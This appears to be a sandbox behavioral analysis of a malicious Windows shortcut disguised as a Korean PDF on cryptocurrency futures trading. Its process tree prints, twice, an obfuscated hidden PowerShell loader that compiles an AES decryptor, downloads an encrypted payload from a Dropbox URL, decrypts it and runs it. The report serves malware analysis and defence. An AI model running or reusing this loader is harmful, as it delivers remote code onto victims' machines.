
Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "ZVhXA" "C:\Users\test22\AppData\Local\Temp\코인 선물 트레이딩 비법서, 수익률 증폭의 핵심 원리.pdf.lnk"

    3036
    • cmd.exe "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkxxxxxxxxxxxxxxxx = 0x009FD0E0;$len1 = 1053892;$len2 = 10458736;$len3 = 10458736;$alis=@('morySt','898','Derive');$ms=-join ('Me',$alis[0],'ream');$rf=-join('Rfc2',$alis[1],$alis[2],'Bytes');$str=@($ms,'rypto',$rf, 'esManag', 'rea');$rep=@('msx','rx','RFDB','mang','ff');$def='using System;using System.IO;using System.Security.Crxgraphy;public class Init{public static Byte[] Dec(Byte[] inBytes,string pwd){msx im=new msx(inBytes);Byte[] s=new Byte[32];int len=im.Read(s,0,s.Length);if(len!=s.Length){return null;}RFDB pbk=new RFDB(pwd,s);Byte[] key=pbk.GetBytes(32);Byte[] iv=pbk.GetBytes(16);Amanged ma=new Amanged();ICrxTransform Dec=ma.CffteDecrxr(key,iv);CrxStffm cs=new CrxStffm(im,Dec,0);msx om=new msx();cs.CopyTo(om);om.Dispose();return om.ToArray();}}';$i=0;$a=1;$p='hoop';$s=@(':','s:');$r=$p -replace 'o','t';foreach($item in $rep){$def=$def -replace $item,$str[$i];$i++;}Add-Type -TypeDefinition $def;$pwd='pa55w0rd';$uh='dl.dropboxusercontent.com/scl/fi/';$agent=('Mozilla/5.0','(Windows NT 10.0; Win64; x64)','AppleWebKit/537.36','(KHTML,like Gecko)','Chrome/104.0.0.0','Safari/537.36') -join ' ';$r=-join ($r,$s[$a],'//',$uh);$ui=$r+'unk6wfun4ys2hyoekf00w/ad_ps.bin?rlkey=tzje3yre9hcve3i3b62pur1ou&st=d0n1avij&dl=0';$req=@{uri=$ui;useragent=$agent};try{[Byte[]]$bytes=(wget @req).content;} catch {if($a -eq 1){$ui=$ui -replace $s[1],$s[0];$req=@{uri=$ui;useragent=$agent};[Byte[]]$bytes=(wget @req).content;}}[Byte[]]$decbytes=[Init]::Dec($bytes,$pwd);$sc=[System.Text.Encoding]::ASCII.GetString($decbytes);iex -command $sc;"

      2184
      • powershell.exe powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkxxxxxxxxxxxxxxxx = 0x009FD0E0;$len1 = 1053892;$len2 = 10458736;$len3 = 10458736;$alis=@('morySt','898','Derive');$ms=-join ('Me',$alis[0],'ream');$rf=-join('Rfc2',$alis[1],$alis[2],'Bytes');$str=@($ms,'rypto',$rf, 'esManag', 'rea');$rep=@('msx','rx','RFDB','mang','ff');$def='using System;using System.IO;using System.Security.Crxgraphy;public class Init{public static Byte[] Dec(Byte[] inBytes,string pwd){msx im=new msx(inBytes);Byte[] s=new Byte[32];int len=im.Read(s,0,s.Length);if(len!=s.Length){return null;}RFDB pbk=new RFDB(pwd,s);Byte[] key=pbk.GetBytes(32);Byte[] iv=pbk.GetBytes(16);Amanged ma=new Amanged();ICrxTransform Dec=ma.CffteDecrxr(key,iv);CrxStffm cs=new CrxStffm(im,Dec,0);msx om=new msx();cs.CopyTo(om);om.Dispose();return om.ToArray();}}';$i=0;$a=1;$p='hoop';$s=@(':','s:');$r=$p -replace 'o','t';foreach($item in $rep){$def=$def -replace $item,$str[$i];$i++;}Add-Type -TypeDefinition $def;$pwd='pa55w0rd';$uh='dl.dropboxusercontent.com/scl/fi/';$agent=('Mozilla/5.0','(Windows NT 10.0; Win64; x64)','AppleWebKit/537.36','(KHTML,like Gecko)','Chrome/104.0.0.0','Safari/537.36') -join ' ';$r=-join ($r,$s[$a],'//',$uh);$ui=$r+'unk6wfun4ys2hyoekf00w/ad_ps.bin?rlkey=tzje3yre9hcve3i3b62pur1ou&st=d0n1avij&dl=0';$req=@{uri=$ui;useragent=$agent};try{[Byte[]]$bytes=(wget @req).content;} catch {if($a -eq 1){$ui=$ui -replace $s[1],$s[0];$req=@{uri=$ui;useragent=$agent};[Byte[]]$bytes=(wget @req).content;}}[Byte[]]$decbytes=[Init]::Dec($bytes,$pwd);$sc=[System.Text.Encoding]::ASCII.GetString($decbytes);iex -command $sc;"

        292
